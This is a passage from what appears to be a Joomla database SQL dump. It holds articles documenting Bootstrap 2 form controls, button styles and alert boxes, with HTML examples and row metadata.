inline\">\r\n <input type=\"checkbox\" id=\"inlineCheckbox2\" value=\"option2\" /> 2\r\n </label>\r\n <label class=\"checkbox inline\">\r\n <input type=\"checkbox\" id=\"inlineCheckbox3\" value=\"option3\" /> 3\r\n </label>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<label class=\"checkbox inline\">\r\n <input type=\"checkbox\" id=\"inlineCheckbox1\" value=\"option1\"> 1\r\n</label>\r\n<label class=\"checkbox inline\">\r\n <input type=\"checkbox\" id=\"inlineCheckbox2\" value=\"option2\"> 2\r\n</label>\r\n<label class=\"checkbox inline\">\r\n <input type=\"checkbox\" id=\"inlineCheckbox3\" value=\"option3\"> 3\r\n</label>\r\n</pre>\r\n \r\n <h3>Selects</h3>\r\n <p>Use the default option or specify a <code>multiple=\"multiple\"</code> to show multiple options at once.</p>\r\n <form class=\"bs-example\">\r\n <select>\r\n <option>1</option>\r\n <option>2</option>\r\n <option>3</option>\r\n <option>4</option>\r\n <option>5</option>\r\n </select>\r\n <br />\r\n <select multiple=\"multiple\">\r\n <option>1</option>\r\n <option>2</option>\r\n <option>3</option>\r\n <option>4</option>\r\n <option>5</option>\r\n </select>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<select>\r\n <option>1</option>\r\n <option>2</option>\r\n <option>3</option>\r\n <option>4</option>\r\n <option>5</option>\r\n</select>\r\n\r\n<select multiple=\"multiple\">\r\n <option>1</option>\r\n <option>2</option>\r\n <option>3</option>\r\n <option>4</option>\r\n <option>5</option>\r\n</select>\r\n</pre>\r\n \r\n \r\n <hr class=\"bs-separator\" />\r\n \r\n \r\n <h2>Extending form controls</h2>\r\n <p>Adding on top of existing browser controls, Bootstrap includes other useful form components.</p>\r\n \r\n <h3>Prepended and appended inputs</h3>\r\n <p>Add text or buttons before or after any text-based input. Do note that <code>select</code> elements are not supported here.</p>\r\n \r\n <h4>Default options</h4>\r\n <p>Wrap an <code>.add-on</code> and an <code>input</code> with one of two classes to prepend or append text to an input.</p>\r\n <form class=\"bs-example\">\r\n <div class=\"input-prepend\">\r\n <span class=\"add-on\">@</span>\r\n <input class=\"span2\" id=\"prependedInput\" type=\"text\" placeholder=\"Username\" />\r\n </div>\r\n <br />\r\n <div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedInput\" type=\"text\" />\r\n <span class=\"add-on\">.00</span>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"input-prepend\">\r\n <span class=\"add-on\">@</span>\r\n <input class=\"span2\" id=\"prependedInput\" type=\"text\" placeholder=\"Username\">\r\n</div>\r\n<div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedInput\" type=\"text\">\r\n <span class=\"add-on\">.00</span>\r\n</div>\r\n</pre>\r\n \r\n <h4>Combined</h4>\r\n <p>Use both classes and two instances of <code>.add-on</code> to prepend and append an input.</p>\r\n <form class=\"bs-example form-inline\">\r\n <div class=\"input-prepend input-append\">\r\n <span class=\"add-on\">$</span>\r\n <input class=\"span2\" id=\"appendedPrependedInput\" type=\"text\" />\r\n <span class=\"add-on\">.00</span>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"input-prepend input-append\">\r\n <span class=\"add-on\">$</span>\r\n <input class=\"span2\" id=\"appendedPrependedInput\" type=\"text\">\r\n <span class=\"add-on\">.00</span>\r\n</div>\r\n</pre>\r\n \r\n <h4>Buttons instead of text</h4>\r\n <p>Instead of a <code><span></code> with text, use a <code>.btn</code> to attach a button (or two) to an input.</p>\r\n <form class=\"bs-example\">\r\n <div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedInputButton\" type=\"text\" />\r\n <button class=\"btn\" type=\"button\">Go!</button>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedInputButton\" type=\"text\">\r\n <button class=\"btn\" type=\"button\">Go!</button>\r\n</div>\r\n</pre>\r\n <form class=\"bs-example\">\r\n <div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedInputButtons\" type=\"text\" />\r\n <button class=\"btn\" type=\"button\">Search</button>\r\n <button class=\"btn\" type=\"button\">Options</button>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedInputButtons\" type=\"text\">\r\n <button class=\"btn\" type=\"button\">Search</button>\r\n <button class=\"btn\" type=\"button\">Options</button>\r\n</div>\r\n</pre>\r\n \r\n <h4>Button dropdowns</h4>\r\n <p></p>\r\n <form class=\"bs-example\">\r\n <div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedDropdownButton\" type=\"text\" />\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">Action <span class=\"caret\"></span></button>\r\n <ul class=\"dropdown-menu\">\r\n <li><a href=\"#\">Action</a></li>\r\n <li><a href=\"#\">Another action</a></li>\r\n <li><a href=\"#\">Something else here</a></li>\r\n <li class=\"divider\"></li>\r\n <li><a href=\"#\">Separated link</a></li>\r\n </ul>\r\n </div>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"input-append\">\r\n <input class=\"span2\" id=\"appendedDropdownButton\" type=\"text\">\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">\r\n Action\r\n <span class=\"caret\"></span>\r\n </button>\r\n <ul class=\"dropdown-menu\">\r\n ...\r\n </ul>\r\n </div>\r\n</div>\r\n</pre>\r\n \r\n <form class=\"bs-example\">\r\n <div class=\"input-prepend\">\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">Action <span class=\"caret\"></span></button>\r\n <ul class=\"dropdown-menu\">\r\n <li><a href=\"#\">Action</a></li>\r\n <li><a href=\"#\">Another action</a></li>\r\n <li><a href=\"#\">Something else here</a></li>\r\n <li class=\"divider\"></li>\r\n <li><a href=\"#\">Separated link</a></li>\r\n </ul>\r\n </div>\r\n <input class=\"span2\" id=\"prependedDropdownButton\" type=\"text\" />\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"input-prepend\">\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">\r\n Action\r\n <span class=\"caret\"></span>\r\n </button>\r\n <ul class=\"dropdown-menu\">\r\n ...\r\n </ul>\r\n </div>\r\n <input class=\"span2\" id=\"prependedDropdownButton\" type=\"text\">\r\n</div>\r\n</pre>\r\n \r\n <form class=\"bs-example\">\r\n <div class=\"input-prepend input-append\">\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">Action <span class=\"caret\"></span></button>\r\n <ul class=\"dropdown-menu\">\r\n <li><a href=\"#\">Action</a></li>\r\n <li><a href=\"#\">Another action</a></li>\r\n <li><a href=\"#\">Something else here</a></li>\r\n <li class=\"divider\"></li>\r\n <li><a href=\"#\">Separated link</a></li>\r\n </ul>\r\n </div>\r\n <input class=\"span2\" id=\"appendedPrependedDropdownButton\" type=\"text\" />\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">Action <span class=\"caret\"></span></button>\r\n <ul class=\"dropdown-menu\">\r\n <li><a href=\"#\">Action</a></li>\r\n <li><a href=\"#\">Another action</a></li>\r\n <li><a href=\"#\">Something else here</a></li>\r\n <li class=\"divider\"></li>\r\n <li><a href=\"#\">Separated link</a></li>\r\n </ul>\r\n </div>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"input-prepend input-append\">\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">\r\n Action\r\n <span class=\"caret\"></span>\r\n </button>\r\n <ul class=\"dropdown-menu\">\r\n ...\r\n </ul>\r\n </div>\r\n <input class=\"span2\" id=\"appendedPrependedDropdownButton\" type=\"text\">\r\n <div class=\"btn-group\">\r\n <button class=\"btn dropdown-toggle\" data-toggle=\"dropdown\">\r\n Action\r\n <span class=\"caret\"></span>\r\n </button>\r\n <ul class=\"dropdown-menu\">\r\n ...\r\n </ul>\r\n </div>\r\n</div>\r\n</pre>\r\n \r\n <h4>Search form</h4>\r\n <form class=\"bs-example form-search\">\r\n <div class=\"input-append\">\r\n <input type=\"text\" class=\"span2 search-query\" />\r\n <button type=\"submit\" class=\"btn\">Search</button>\r\n </div>\r\n <div class=\"input-prepend\">\r\n <button type=\"submit\" class=\"btn\">Search</button>\r\n <input type=\"text\" class=\"span2 search-query\" />\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<form class=\"form-search\">\r\n <div class=\"input-append\">\r\n <input type=\"text\" class=\"span2 search-query\">\r\n <button type=\"submit\" class=\"btn\">Search</button>\r\n </div>\r\n <div class=\"input-prepend\">\r\n <button type=\"submit\" class=\"btn\">Search</button>\r\n <input type=\"text\" class=\"span2 search-query\">\r\n </div>\r\n</form>\r\n</pre>\r\n \r\n <h3>Control sizing</h3>\r\n <p>Use relative sizing classes like <code>.input-large</code> or match your inputs to the grid column sizes using <code>.span*</code> classes.</p>\r\n \r\n <h4>Block level inputs</h4>\r\n <p>Make any <code><input></code> or <code><textarea></code> element behave like a block level element.</p>\r\n <form class=\"bs-example\" style=\"padding-bottom: 15px;\">\r\n <div class=\"controls\">\r\n <input class=\"input-block-level\" type=\"text\" placeholder=\".input-block-level\" />\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input class=\"input-block-level\" type=\"text\" placeholder=\".input-block-level\">\r\n</pre>\r\n \r\n <h4>Relative sizing</h4>\r\n <form class=\"bs-example\" style=\"padding-bottom: 15px;\">\r\n <div class=\"controls docs-input-sizes\">\r\n <input class=\"input-mini\" type=\"text\" placeholder=\".input-mini\" />\r\n <input class=\"input-small\" type=\"text\" placeholder=\".input-small\" />\r\n <input class=\"input-medium\" type=\"text\" placeholder=\".input-medium\" />\r\n <input class=\"input-large\" type=\"text\" placeholder=\".input-large\" />\r\n <input class=\"input-xlarge\" type=\"text\" placeholder=\".input-xlarge\" />\r\n <input class=\"input-xxlarge\" type=\"text\" placeholder=\".input-xxlarge\" />\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input class=\"input-mini\" type=\"text\" placeholder=\".input-mini\">\r\n<input class=\"input-small\" type=\"text\" placeholder=\".input-small\">\r\n<input class=\"input-medium\" type=\"text\" placeholder=\".input-medium\">\r\n<input class=\"input-large\" type=\"text\" placeholder=\".input-large\">\r\n<input class=\"input-xlarge\" type=\"text\" placeholder=\".input-xlarge\">\r\n<input class=\"input-xxlarge\" type=\"text\" placeholder=\".input-xxlarge\">\r\n</pre>\r\n <p>\r\n <span class=\"label label-info\">Heads up!</span> In future versions, we\'ll be altering the use of these relative input classes to match our button sizes. For example, <code>.input-large</code> will increase the padding and font-size of an input.\r\n </p>\r\n \r\n <h4>Grid sizing</h4>\r\n <p>Use <code>.span1</code> to <code>.span12</code> for inputs that match the same sizes of the grid columns.</p>\r\n <form class=\"bs-example\" style=\"padding-bottom: 15px;\">\r\n <div class=\"controls docs-input-sizes\">\r\n <input class=\"span1\" type=\"text\" placeholder=\".span1\" />\r\n <input class=\"span2\" type=\"text\" placeholder=\".span2\" />\r\n <input class=\"span3\" type=\"text\" placeholder=\".span3\" />\r\n <select class=\"span1\">\r\n <option>1</option>\r\n <option>2</option>\r\n <option>3</option>\r\n <option>4</option>\r\n <option>5</option>\r\n </select>\r\n <select class=\"span2\">\r\n <option>1</option>\r\n <option>2</option>\r\n <option>3</option>\r\n <option>4</option>\r\n <option>5</option>\r\n </select>\r\n <select class=\"span3\">\r\n <option>1</option>\r\n <option>2</option>\r\n <option>3</option>\r\n <option>4</option>\r\n <option>5</option>\r\n </select>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input class=\"span1\" type=\"text\" placeholder=\".span1\">\r\n<input class=\"span2\" type=\"text\" placeholder=\".span2\">\r\n<input class=\"span3\" type=\"text\" placeholder=\".span3\">\r\n<select class=\"span1\">\r\n ...\r\n</select>\r\n<select class=\"span2\">\r\n ...\r\n</select>\r\n<select class=\"span3\">\r\n ...\r\n</select>\r\n</pre>\r\n \r\n <p>For multiple grid inputs per line, <strong>use the <code>.controls-row</code> modifier class for proper spacing</strong>. It floats the inputs to collapse white-space, sets the proper margins, and the clears the float.</p>\r\n <form class=\"bs-example\" style=\"padding-bottom: 15px;\">\r\n <div class=\"controls\">\r\n <input class=\"span5\" type=\"text\" placeholder=\".span5\" />\r\n </div>\r\n <div class=\"controls controls-row\">\r\n <input class=\"span4\" type=\"text\" placeholder=\".span4\" />\r\n <input class=\"span1\" type=\"text\" placeholder=\".span1\" />\r\n </div>\r\n <div class=\"controls controls-row\">\r\n <input class=\"span3\" type=\"text\" placeholder=\".span3\" />\r\n <input class=\"span2\" type=\"text\" placeholder=\".span2\" />\r\n </div>\r\n <div class=\"controls controls-row\">\r\n <input class=\"span2\" type=\"text\" placeholder=\".span2\" />\r\n <input class=\"span3\" type=\"text\" placeholder=\".span3\" />\r\n </div>\r\n <div class=\"controls controls-row\">\r\n <input class=\"span1\" type=\"text\" placeholder=\".span1\" />\r\n <input class=\"span4\" type=\"text\" placeholder=\".span4\" />\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"controls\">\r\n <input class=\"span5\" type=\"text\" placeholder=\".span5\">\r\n</div>\r\n<div class=\"controls controls-row\">\r\n <input class=\"span4\" type=\"text\" placeholder=\".span4\">\r\n <input class=\"span1\" type=\"text\" placeholder=\".span1\">\r\n</div>\r\n...\r\n</pre>\r\n \r\n <h3>Uneditable inputs</h3>\r\n <p>Present data in a form that\'s not editable without using actual form markup.</p>\r\n <form class=\"bs-example\">\r\n <span class=\"input-xlarge uneditable-input\">Some value here</span>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<span class=\"input-xlarge uneditable-input\">Some value here</span>\r\n</pre>\r\n \r\n <h3>Form actions</h3>\r\n <p>End a form with a group of actions (buttons). When placed within a <code>.form-horizontal</code>, the buttons will automatically indent to line up with the form controls.</p>\r\n <form class=\"bs-example\">\r\n <div class=\"form-actions\">\r\n <button type=\"submit\" class=\"btn btn-primary\">Save changes</button>\r\n <button type=\"button\" class=\"btn\">Cancel</button>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"form-actions\">\r\n <button type=\"submit\" class=\"btn btn-primary\">Save changes</button>\r\n <button type=\"button\" class=\"btn\">Cancel</button>\r\n</div>\r\n</pre>\r\n \r\n <h3>Help text</h3>\r\n <p>Inline and block level support for help text that appears around form controls.</p>\r\n <h4>Inline help</h4>\r\n <form class=\"bs-example form-inline\">\r\n <input type=\"text\" /> <span class=\"help-inline\">Inline help text</span>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input type=\"text\"><span class=\"help-inline\">Inline help text</span>\r\n</pre>\r\n \r\n <h4>Block help</h4>\r\n <form class=\"bs-example form-inline\">\r\n <input type=\"text\" />\r\n <span class=\"help-block\">A longer block of help text that breaks onto a new line and may extend beyond one line.</span>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input type=\"text\"><span class=\"help-block\">A longer block of help text that breaks onto a new line and may extend beyond one line.</span>\r\n</pre>\r\n \r\n \r\n <hr class=\"bs-separator\" />\r\n \r\n \r\n <h2>Form control states</h2>\r\n <p>Provide feedback to users or visitors with basic feedback states on form controls and labels.</p>\r\n \r\n <h3>Input focus</h3>\r\n <p>We remove the default <code>outline</code> styles on some form controls and apply a <code>box-shadow</code> in its place for <code>:focus</code>.</p>\r\n <form class=\"bs-example form-inline\">\r\n <input class=\"input-xlarge focused\" id=\"focusedInput\" type=\"text\" value=\"This is focused...\" />\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input class=\"input-xlarge\" id=\"focusedInput\" type=\"text\" value=\"This is focused...\">\r\n</pre>\r\n \r\n <h3>Disabled inputs</h3>\r\n <p>Add the <code>disabled</code> attribute on an input to prevent user input and trigger a slightly different look.</p>\r\n <form class=\"bs-example form-inline\">\r\n <input class=\"input-xlarge\" id=\"disabledInput\" type=\"text\" placeholder=\"Disabled input here…\" />\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<input class=\"input-xlarge\" id=\"disabledInput\" type=\"text\" placeholder=\"Disabled input here...\" disabled>\r\n</pre>\r\n \r\n <h3>Validation states</h3>\r\n <p>Bootstrap includes validation styles for error, warning, info, and success messages. To use, add the appropriate class to the surrounding <code>.control-group</code>.</p>\r\n \r\n <form class=\"bs-example form-horizontal\">\r\n <div class=\"control-group warning\">\r\n <label class=\"control-label\" for=\"inputWarning\">Input with warning</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputWarning\" />\r\n <span class=\"help-inline\">Something may have gone wrong</span>\r\n </div>\r\n </div>\r\n <div class=\"control-group error\">\r\n <label class=\"control-label\" for=\"inputError\">Input with error</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputError\" />\r\n <span class=\"help-inline\">Please correct the error</span>\r\n </div>\r\n </div>\r\n <div class=\"control-group info\">\r\n <label class=\"control-label\" for=\"inputInfo\">Input with info</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputInfo\" />\r\n <span class=\"help-inline\">Username is taken</span>\r\n </div>\r\n </div>\r\n <div class=\"control-group success\">\r\n <label class=\"control-label\" for=\"inputSuccess\">Input with success</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputSuccess\" />\r\n <span class=\"help-inline\">Woohoo!</span>\r\n </div>\r\n </div>\r\n </form>\r\n <pre class=\"prettyprint linenums\">\r\n<div class=\"control-group warning\">\r\n <label class=\"control-label\" for=\"inputWarning\">Input with warning</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputWarning\">\r\n <span class=\"help-inline\">Something may have gone wrong</span>\r\n </div>\r\n</div>\r\n<div class=\"control-group error\">\r\n <label class=\"control-label\" for=\"inputError\">Input with error</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputError\">\r\n <span class=\"help-inline\">Please correct the error</span>\r\n </div>\r\n</div>\r\n<div class=\"control-group success\">\r\n <label class=\"control-label\" for=\"inputSuccess\">Input with success</label>\r\n <div class=\"controls\">\r\n <input type=\"text\" id=\"inputSuccess\">\r\n <span class=\"help-inline\">Woohoo!</span>\r\n </div>\r\n</div>\r\n</pre>\r\n \r\n</section>\r\n','',1,78,'2012-11-18 13:47:50',736,'','2012-11-18 15:55:20',42,736,'2015-06-15 07:37:29','2012-11-18 13:47:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,6,'','',1,105,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(78,185,'Buttons','buttons','<section id=\"buttons\">\r\n <h1 class=\"title\">Buttons</h1>\r\n\r\n <h2>Default buttons</h2>\r\n <p>Button styles can be applied to anything with the <code>.btn</code> class applied. However, typically you\'ll want to apply these to only <code><a></code> and <code><button></code> elements for the best rendering.</p>\r\n <table class=\"table table-bordered table-striped\">\r\n <thead>\r\n <tr>\r\n <th>Button</th>\r\n <th>class=\"\"</th>\r\n <th>Description</th>\r\n </tr>\r\n </thead>\r\n <tbody>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn\">Default</button></td>\r\n <td><code>btn</code></td>\r\n <td>Standard gray button with gradient</td>\r\n </tr>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn btn-primary\">Primary</button></td>\r\n <td><code>btn btn-primary</code></td>\r\n <td>Provides extra visual weight and identifies the primary action in a set of buttons</td>\r\n </tr>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn btn-info\">Info</button></td>\r\n <td><code>btn btn-info</code></td>\r\n <td>Used as an alternative to the default styles</td>\r\n </tr>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn btn-success\">Success</button></td>\r\n <td><code>btn btn-success</code></td>\r\n <td>Indicates a successful or positive action</td>\r\n </tr>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn btn-warning\">Warning</button></td>\r\n <td><code>btn btn-warning</code></td>\r\n <td>Indicates caution should be taken with this action</td>\r\n </tr>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn btn-danger\">Danger</button></td>\r\n <td><code>btn btn-danger</code></td>\r\n <td>Indicates a dangerous or potentially negative action</td>\r\n </tr>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn btn-inverse\">Inverse</button></td>\r\n <td><code>btn btn-inverse</code></td>\r\n <td>Alternate dark gray button, not tied to a semantic action or use</td>\r\n </tr>\r\n <tr>\r\n <td><button type=\"button\" class=\"btn btn-link\">Link</button></td>\r\n <td><code>btn btn-link</code></td>\r\n <td>Deemphasize a button by making it look like a link while maintaining button behavior</td>\r\n </tr>\r\n </tbody>\r\n </table>\r\n\r\n <h4>Cross browser compatibility</h4>\r\n <p>IE9 doesn\'t crop background gradients on rounded corners, so we remove it. Related, IE9 jankifies disabled <code>button</code> elements, rendering text gray with a nasty text-shadow that we cannot fix.</p>\r\n\r\n\r\n <h2>Button sizes</h2>\r\n <p>Fancy larger or smaller buttons? Add <code>.btn-large</code>, <code>.btn-small</code>, or <code>.btn-mini</code> for additional sizes.</p>\r\n <div class=\"bs-example\">\r\n <p>\r\n <button type=\"button\" class=\"btn btn-large btn-primary\">Large button</button>\r\n <button type=\"button\" class=\"btn btn-large\">Large button</button>\r\n </p>\r\n <p>\r\n <button type=\"button\" class=\"btn btn-primary\">Default button</button>\r\n <button type=\"button\" class=\"btn\">Default button</button>\r\n </p>\r\n <p>\r\n <button type=\"button\" class=\"btn btn-small btn-primary\">Small button</button>\r\n <button type=\"button\" class=\"btn btn-small\">Small button</button>\r\n </p>\r\n <p>\r\n <button type=\"button\" class=\"btn btn-mini btn-primary\">Mini button</button>\r\n <button type=\"button\" class=\"btn btn-mini\">Mini button</button>\r\n </p>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<p>\r\n<button class=\"btn btn-large btn-primary\" type=\"button\">Large button</button>\r\n<button class=\"btn btn-large\" type=\"button\">Large button</button>\r\n</p>\r\n<p>\r\n<button class=\"btn btn-primary\" type=\"button\">Default button</button>\r\n<button class=\"btn\" type=\"button\">Default button</button>\r\n</p>\r\n<p>\r\n<button class=\"btn btn-small btn-primary\" type=\"button\">Small button</button>\r\n<button class=\"btn btn-small\" type=\"button\">Small button</button>\r\n</p>\r\n<p>\r\n<button class=\"btn btn-mini btn-primary\" type=\"button\">Mini button</button>\r\n<button class=\"btn btn-mini\" type=\"button\">Mini button</button>\r\n</p>\r\n</pre>\r\n <p>Create block level buttons—those that span the full width of a parent— by adding <code>.btn-block</code>.</p>\r\n <div class=\"bs-example\">\r\n <div class=\"well\" style=\"max-width: 400px; margin: 0 auto 10px;\">\r\n <button type=\"button\" class=\"btn btn-large btn-block btn-primary\">Block level button</button>\r\n <button type=\"button\" class=\"btn btn-large btn-block\">Block level button</button>\r\n </div>\r\n </div>\r\n<pre class=\"prettyprint linenums\">\r\n<button class=\"btn btn-large btn-block btn-primary\" type=\"button\">Block level button</button>\r\n<button class=\"btn btn-large btn-block\" type=\"button\">Block level button</button>\r\n</pre>\r\n\r\n\r\n <h2>Disabled state</h2>\r\n <p>Make buttons look unclickable by fading them back 50%.</p>\r\n\r\n <h3>Anchor element</h3>\r\n <p>Add the <code>.disabled</code> class to <code><a></code> buttons.</p>\r\n <p class=\"bs-example\">\r\n <a href=\"#\" class=\"btn btn-large btn-primary disabled\">Primary link</a>\r\n <a href=\"#\" class=\"btn btn-large disabled\">Link</a>\r\n </p>\r\n<pre class=\"prettyprint linenums\">\r\n<a href=\"#\" class=\"btn btn-large btn-primary disabled\">Primary link</a>\r\n<a href=\"#\" class=\"btn btn-large disabled\">Link</a>\r\n</pre>\r\n <p>\r\n <span class=\"label label-info\">Heads up!</span>\r\n We use <code>.disabled</code> as a utility class here, similar to the common <code>.active</code> class, so no prefix is required. Also, this class is only for aesthetic; you must use custom JavaScript to disable links here.\r\n </p>\r\n\r\n <h3>Button element</h3>\r\n <p>Add the <code>disabled</code> attribute to <code><button></code> buttons.</p>\r\n <p class=\"bs-example\">\r\n <button type=\"button\" class=\"btn btn-large btn-primary disabled\" disabled=\"disabled\">Primary button</button>\r\n <button type=\"button\" class=\"btn btn-large\">Button</button>\r\n </p>\r\n<pre class=\"prettyprint linenums\">\r\n<button type=\"button\" class=\"btn btn-large btn-primary disabled\" disabled=\"disabled\">Primary button</button>\r\n<button type=\"button\" class=\"btn btn-large\" disabled>Button</button>\r\n</pre>\r\n\r\n\r\n <h2>One class, multiple tags</h2>\r\n <p>Use the <code>.btn</code> class on an <code><a></code>, <code><button></code>, or <code><input></code> element.</p>\r\n <form class=\"bs-example\">\r\n <a class=\"btn\" href=\"\">Link</a>\r\n <button class=\"btn\" type=\"submit\">Button</button>\r\n <input class=\"btn\" type=\"button\" value=\"Input\" />\r\n <input class=\"btn\" type=\"submit\" value=\"Submit\" />\r\n </form>\r\n<pre class=\"prettyprint linenums\">\r\n<a class=\"btn\" href=\"\">Link</a>\r\n<button class=\"btn\" type=\"submit\">Button</button>\r\n<input class=\"btn\" type=\"button\" value=\"Input\">\r\n<input class=\"btn\" type=\"submit\" value=\"Submit\">\r\n</pre>\r\n <p>As a best practice, try to match the element for your context to ensure matching cross-browser rendering. If you have an <code>input</code>, use an <code><input type=\"submit\"></code> for your button.</p>\r\n\r\n</section>','',1,78,'2012-11-18 14:05:06',736,'','2012-11-21 08:12:24',42,736,'2015-06-15 07:37:30','2012-11-18 14:05:06','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":null,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":null,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":null,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,7,'','',1,81,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(79,186,'Notice & Alerts','notice-alerts','<h1 class=\"title\">Notice & Error</h1>\r\n<h3>Error or danger</h3>\r\n<div class=\"bs-example\">\r\n <div class=\"alert alert-error\">\r\n <strong>Oh snap!</strong> Change a few things up and try submitting again.\r\n </div>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"alert alert-error\">\r\n ...\r\n</div>\r\n</pre>\r\n\r\n<h3>Success</h3>\r\n<div class=\"bs-example\">\r\n <div class=\"alert alert-success\">\r\n <strong>Well done!</strong> You successfully read this important alert message.\r\n </div>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"alert alert-success\">\r\n ...\r\n</div>\r\n</pre>\r\n\r\n<h3>Information</h3>\r\n<div class=\"bs-example\">\r\n <div class=\"alert alert-info\">\r\n <strong>Heads up!</strong> This alert needs your attention, but it\'s not super important.\r\n </div>\r\n</div>\r\n<pre class=\"prettyprint linenums\">\r\n<div class=\"alert alert-info\">\r\n ...\r\n</div>\r\n</pre>','',1,78,'2012-11-18 14:07:40',736,'','2012-11-21 08:12:24',42,0,'0000-00-00 00:00:00','2012-11-18 14:07:40','0000-00-00 